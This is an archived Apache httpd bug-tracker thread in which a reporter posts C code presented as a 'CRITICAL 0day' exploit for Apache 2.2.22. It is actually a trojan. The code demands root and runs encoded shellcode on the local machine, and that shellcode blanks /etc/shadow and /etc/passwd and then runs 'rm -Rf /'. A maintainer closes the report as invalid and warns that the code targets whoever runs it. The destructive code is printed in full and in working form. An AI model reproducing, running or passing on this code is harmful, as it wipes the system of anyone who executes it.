You are viewing a plain text version of this content. The canonical link for it is here.

Posted to bugs@httpd.apache.org by bu...@apache.org on 2014/04/15 07:30:23 UTC

[Bug 56411] New: CRITICAL 0day For Apache 2.2.22

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

            Bug ID: 56411
           Summary: CRITICAL 0day For Apache 2.2.22
           Product: Apache httpd-2
           Version: 2.2.22
          Hardware: PC
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Core
          Assignee: bugs@httpd.apache.org
          Reporter: johnmusbach1@gmail.com

/*
Exploit  : Apache 0day Exploit
Author:  : okno
Compile  : gcc  -W apache0.c -o apache0
Usage:   : ./0apache HOST IP
Thanks   : ergufo, stutm, mz, ascii
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
  printf("Target : Apache 2.2.22 to Apache 2.4.2\n");
  printf("Type   : 0day\n");
  printf("Author : okno mail@pawelzorzan.eu\n");
  printf("Web    : http://www.pawelzorzan.eu\n");
  printf("Exec   : %s <serverapache> <porta>\n\n", argv[0]);
  exit(1);
}

unsigned char shellcode[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
"\xcd\x80";

int main(int argc, char *argv[])
{
  int uid = getuid();
  int porta = 80, sock;
  struct hostent *host;
  struct sockaddr_in addr;

  if(uid !=0)
  {
    fprintf(stderr, "- Error - Need ROOT lamah!!\n");
    exit(1);
  }
  if(uid == 0)
  {
    printf("\t+ OK Exploitting..\n");
  }
  if(argc != 3)
       usage(argv);

  fprintf(stderr, "- FUCK\n");
  (*(void(*)())shellcode)();
  exit(1);
  char payload[1024];
  memcpy(payload, &shellcode, sizeof(shellcode));
  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  {
    printf("+ OK we are in... Se non capisci SIAMO DENTRO!\n");
    system("/bin/sh");
  }
  else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  {
    fprintf(stderr, "- Failed! You suck & Your mother too!!\n");
    exit(1);
  }
}

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org

[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

Yann Ylavic <yl...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|---                         |INVALID

--- Comment #2 from Yann Ylavic <yl...@gmail.com> ---
Hmm, this exploit does not even connect anything and the payload has nothing to
do with HTTP. Except eyes, it won't hurt much...

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org

[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

--- Comment #1 from johnmusbach1@gmail.com ---
I found it by googling for apache 2.2.22 exploits, the source is
http://pastebin.com/j70T9KHJ. Scary!

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org

[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

--- Comment #3 from Yann Ylavic <yl...@gmail.com> ---
Don't compile/run it on your local system though, it's probably the target.

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org

[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

johnmusbach1@gmail.com changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
           Priority|P2                          |P1
           Severity|normal                      |critical

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org